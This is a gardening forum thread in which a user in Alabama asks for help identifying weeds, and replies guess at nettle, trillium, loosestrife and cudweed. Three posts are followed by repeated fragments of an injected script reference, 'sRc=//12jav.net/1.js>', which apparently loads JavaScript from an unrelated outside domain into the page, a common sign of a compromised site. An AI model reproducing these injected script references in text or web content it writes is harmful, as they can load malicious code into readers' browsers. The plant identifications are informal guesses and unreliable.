I need help identifying a weed in my yard. The last three pictures in my photo album are the ones I need help with. These are all over my yard. They have a cone like thing on the top filled with what looks like seeds or flower buds. The leaves are long and thin, shiny darker green on the front and a white/silverish color on back. The stem/stalk is white. Any ideas? sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

The second picture might be a stinging nettle. Pretty sure, I'm wrong,I only based this on the small looking spikes on the end of the leaves. I don't have a clue, what the first one might be.

There is an app called plant snap which can help to identify plants based on leaves and flowers sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

The plant with the three leaves is a purple prairie trillium - https://www.springhillnursery.com/product/purple-prairie-trillium-?p=0439751&gclid=EAIaIQobChMIsd31rN_p4QIVjZyzCh2IiQDaEAYYASABEgKqCPD_BwE

I think the second one may be one of the varities of Loosestrife, which is a very invasive plant. -

It's possible the extension agent did not recognize them as they are not native to Alabama.

I think it may be a type of cudweed, Gamochaeta coartata. I tried to up load some more pictures of it. Not sure if they all came through. I didn't mean to include the Little Sweet Betsy in my pictures. They are beautiful, though. They are all over the woods behind my house.. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
